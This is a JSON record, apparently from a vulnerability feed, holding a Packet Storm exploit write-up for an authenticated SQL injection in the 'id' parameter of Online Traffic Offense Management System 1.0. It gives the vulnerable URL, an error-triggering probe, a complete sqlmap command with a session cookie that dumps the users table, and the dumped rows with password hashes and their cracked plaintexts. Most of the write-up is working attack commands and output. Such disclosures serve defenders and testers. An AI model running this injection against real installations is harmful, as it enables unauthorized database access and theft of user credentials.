{"id": "PACKETSTORM:163893", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Online Traffic Offense Management System 1.0 SQL Injection", "description": "", "published": "2021-08-20T00:00:00", "modified": "2021-08-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/163893/Online-Traffic-Offense-Management-System-1.0-SQL-Injection.html", "reporter": "Justin White", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-08-20T15:55:56", "viewCount": 111, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/163893/otoms10-sql.txt", "sourceData": "`# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated) \n# Date: 19/08/2021 \n# Exploit Author: Justin White \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html \n# Version: 1.0 \n# Tested on: Linux (Ubuntu 20.04) using LAMPP \n \n## SQL Injection \n \n# Vulnerable page \nhttp://localhost/traffic_offense/admin/?page=drivers/manage_driver&id= \n \n# Vulnerable parameter \nThe id parameter is vulnerable to SQL injection. \n \n# POC \nGoing to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page. 
\n \nNotice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5 \nNotice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10 \n \nUsing sqlmap with dump database \nsqlmap -u \"http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4\" --cookie=\"PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac\" -D traffic_offense_db -T users --dump \n \n+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \n| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated | \n+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \n| 1 | 1 | uploads/1624240500_avatar.png | Admin | 0192023a7bbd73250516f069df18b500 (admin123) | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2021-06-21 09:55:07 | \n| 9 | 2 | uploads/1629336240_avatar.jpg | Smith | 202cb962ac59075b964b07152d234b70 (123) | jsmith1 | John | 2021-08-19 09:24:25 | NULL | 2021-08-19 19:14:58 | \n+----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+ \n \n`\n", "_state": {"dependencies": 1646161120}}